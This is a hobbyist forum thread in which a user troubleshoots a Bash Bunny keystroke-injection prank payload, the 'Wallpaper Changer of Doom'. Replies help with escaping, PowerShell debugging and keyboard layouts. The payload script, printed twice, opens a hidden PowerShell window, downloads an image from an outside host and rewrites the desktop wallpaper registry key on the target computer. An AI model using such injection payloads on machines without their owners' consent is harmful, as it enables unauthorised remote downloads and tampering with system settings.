First payload experiments, no typing from HID

[Dragus]

Hello everyone,
I've been fiddling with multiple payloads for a while on multiple computers. I've seen various results (depending on the PC) and got very close (I think) to make a few of the payloads work properly after changing their configuration.

One I'd like to get working for a starter is the Wallpaper Changer of Doom .

It's not related to that specific payload, but on the Windows 7 computer, it opens the command prompt (with "CMD" in it) and nothing happens. The first time I plugged it in, it installed a driver (from Windows) for a few minutes.

I think it's an issue related to Quack (typing characters), here's what I got so far:

LED SETUP
ATTACKMODE HID
LED ATTACK
Q GUI r
Q DELAY 1000
Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}""
Q ENTER

It seems to be blinking yellow from that point.

Any idea how I could debug this?

[PoSHMagiC0de]

Hmm, on your computer when you hit "windows key + r" what happens?

 

If nothing, you have a keyboard like mine that can disable the windows key and that also stops the BB GUI command.  If not, try opening notepad and set a payload to just type string to see if anything is coming across at all.

 

[Dragus]

I tried it, Windows + R opens the command prompt with "cmd" written in it.

It's the same thing I see when executing the payload, but after that, no text is written.

I'll try a payload to only write text and see from there (it'll take a while so I learn the basics furthermore), it's a good idea since it would isolate the issue.

Thanks for the reply!

[Dragus]

Here's a follow-up!

I think there's a typo on the YouTube video or Github, not sure from where yet. There was an unescaped quote at the end of the line. This works "better":

LED SETUP
ATTACKMODE HID
LED ATTACK
Q GUI r
Q DELAY 1000
Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}\""
Q ENTER

Now the result is that I see Powershell open up and close right away. I'm not sure if it's the normal behavior since there are many variations of this prank script. (if someone knows, enlight me)

Also, that's me being slightly lazy, but in this script's context, what would the variable $home typically point to? I wanna debug further and try to find the image.

Finally, do you think that the image fetching follows the URL (there are redirections)? Or it fails because the first answer wasn't HTTP 200?

Thank you for any ideas, I'm happy I progressed!

 

[Dave-ee Jones]

@Dragus

You can try adding a 

pause

at the end of your Powershell command. This will keep the Powershell window open until you press Enter so you can see errors and the like. Very useful.

$home points to your current Users home directory.

E.g. if your name is 'User' then it will go to:

C:\Users\User

Not sure about $p. Old me might've known..

[Dragus]

`Thanks! That helped me find the reason for my next problem.

Here is what it really writes in the command prompt:

powershell -w h `$p=$home+`<z.jpg`;iwr https:ééwww.magikweb.caéz.jpg -O $p;SP `HKCU:Control Panel<Desktop`WallPaper $p;1..29>%^RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1¨pause

That's really messy. It seems like it's assuming I have a US English keyboard. Is that a common issue? I would think a lot of non-US countries' users would have a similar issue.

[Dragus]

I forgot to add context in my last post. I thought about using DUCKY_LANG, but my keyboard (and most people here) does not follow 2-letter country codes.

Here's one of mine (the one I use the most): https://prnt.sc/ml9yya

Is there a way for the Bash Bunny to automatically adapt to the target's environment? (the windows' current keyboard)